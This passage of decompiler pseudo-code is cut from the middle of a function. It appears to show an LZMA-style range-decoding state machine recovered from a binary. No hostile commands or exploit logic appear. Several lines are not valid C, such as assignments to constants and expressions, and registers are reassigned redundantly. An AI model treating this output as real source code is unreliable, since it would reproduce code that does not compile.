                                                                                                                                                                                                              												goto L137;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 5:
                                                                                                                                                                                                              											L137:
                                                                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(_t612 - 0x88) = 5;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L139:
                                                                                                                                                                                                              											_t533 =  *(_t612 - 0x84);
                                                                                                                                                                                                              											goto L140;
                                                                                                                                                                                                              										case 6:
                                                                                                                                                                                                              											__edx = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												goto L132;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                              											__cl = 8;
                                                                                                                                                                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                              													_t98 = __ebp - 0x38;
                                                                                                                                                                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                              													__eflags =  *_t98;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                              											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												__ebx = 1;
                                                                                                                                                                                                              												goto L61;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 8);
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												__ebx = 1;
                                                                                                                                                                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              												goto L41;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 7:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eax = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              												goto L69;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              											goto L132;
                                                                                                                                                                                                              										case 8:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											goto L132;
                                                                                                                                                                                                              										case 9:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												goto L90;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                              											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                              											__eflags = _t259;
                                                                                                                                                                                                              											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                                              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                                              											goto L76;
                                                                                                                                                                                                              										case 0xa:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												goto L132;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              											goto L89;
                                                                                                                                                                                                              										case 0xb:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              											L89:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											L90:
                                                                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                                                                              											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              											goto L69;
                                                                                                                                                                                                              										case 0xc:
                                                                                                                                                                                                              											L100:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t335 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t335;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											goto L102;
                                                                                                                                                                                                              										case 0xd:
                                                                                                                                                                                                              											L37:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t122 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t122;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L39:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              												goto L48;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                                                                              												goto L54;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L41:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                              											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                                                                              											__eax = __eax << 8;
                                                                                                                                                                                                              											__eax = __eax + __ebx;
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												__cx = __ax;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              												0x800 = 0x800 - __edx;
                                                                                                                                                                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L39;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L37;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0xe:
                                                                                                                                                                                                              											L46:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t156 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t156;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												L48:
                                                                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                              													__ebx = _t170;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													continue;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L46;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L54:
                                                                                                                                                                                                              											_t173 = __ebp - 0x34;
                                                                                                                                                                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                              											__eflags =  *_t173;
                                                                                                                                                                                                              											goto L55;
                                                                                                                                                                                                              										case 0xf:
                                                                                                                                                                                                              											L58:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t203 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t203;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L60:
                                                                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                                                                              												L55:
                                                                                                                                                                                                              												__al =  *(__ebp - 0x44);
                                                                                                                                                                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                              												goto L56;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L61:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__edx = __ebx + __ebx;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              											__esi = __edx + __eax;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												__cx = __ax;
                                                                                                                                                                                                              												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                              												__ebx = _t217;
                                                                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              												0x800 = 0x800 - __edi;
                                                                                                                                                                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L60;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0x10:
                                                                                                                                                                                                              											L110:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t366 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t366;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											goto L112;
                                                                                                                                                                                                              										case 0x11:
                                                                                                                                                                                                              											L69:
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                              											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                              											L132:
                                                                                                                                                                                                              											 *(_t612 - 0x54) = _t605;
                                                                                                                                                                                                              											goto L133;
                                                                                                                                                                                                              										case 0x12:
                                                                                                                                                                                                              											goto L0;
                                                                                                                                                                                                              										case 0x13:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												_t469 = __ebp - 0x58;
                                                                                                                                                                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                              												__eflags =  *_t469;
                                                                                                                                                                                                              												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                              												goto L144;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                              											goto L130;
                                                                                                                                                                                                              										case 0x14:
                                                                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                              											L140:
                                                                                                                                                                                                              											 *(_t612 - 0x88) = _t533;
                                                                                                                                                                                                              											goto L1;
                                                                                                                                                                                                              										case 0x15:
                                                                                                                                                                                                              											__eax = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              											__al = __al & 0x000000fd;
                                                                                                                                                                                                              											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              											goto L121;
                                                                                                                                                                                                              										case 0x16:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              											__eflags = __eax - 4;
                                                                                                                                                                                                              											if(__eax >= 4) {
                                                                                                                                                                                                              												_push(3);
                                                                                                                                                                                                              												_pop(__eax);
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              											 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                              											__eax = __eax << 7;
                                                                                                                                                                                                              											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                              											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              											goto L145;
                                                                                                                                                                                                              										case 0x17:
                                                                                                                                                                                                              											goto L145;
                                                                                                                                                                                                              										case 0x18:
                                                                                                                                                                                                              											L146:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
